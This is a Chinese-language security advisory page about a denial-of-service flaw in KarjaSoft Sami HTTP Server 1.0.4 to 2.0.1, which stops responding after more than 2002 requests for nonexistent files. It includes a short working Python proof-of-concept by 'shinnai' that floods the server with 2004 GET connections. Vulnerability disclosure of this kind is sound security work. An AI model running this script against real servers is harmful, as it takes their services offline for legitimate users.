KarjaSoft Sami HTTP Server连接处理远程拒绝服务漏洞
发布日期:2007-01-22
更新日期:2007-01-30
受影响系统:KarjaSoft Sami HTTP Server 2.0.1
KarjaSoft Sami HTTP Server 1.0.5
KarjaSoft Sami HTTP Server 1.0.4
描述:
BUGTRAQ ID:
22159
Sami HTTP Server是一款小型的HTTP服务软件,支持PHP功能。
Sami HTTP Server无法处理对不存在对象的多个连续请求,如果攻击者连续多次(大于2002次)试图连接到服务器,就会导致停止响应其他请求。
<*来源:shinnai (
shinnai@autistici.org)
链接:
http://secunia.com/advisories/23901/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import socket
print "-------------------------------------------------------------------------------------------------------"
print "Sami HTTP Server HTTP 404 - Object not found Denial of Service"
print "url:
http://www.karjasoft.com"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site:
http://shinnai.altervista.org"
print ""
print "The server is unable to handle more than 2002 requests to nonexistents"
print "files, pages, folders etc."
print "When the number of requests exceed the 2002, it stops to answer, stops"
print "to write to log file and the admin will be unable to kick or ban users."
print "The only thing you can do is to kill the process."
print "-------------------------------------------------------------------------------------------------------"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (0,2004):
request = "GET /some.txt HTTP/1.0 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Unable to connect. exiting."
建议:
厂商补丁:
KarjaSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.karja.com/浏览次数:2703
严重程度:0(网友投票)
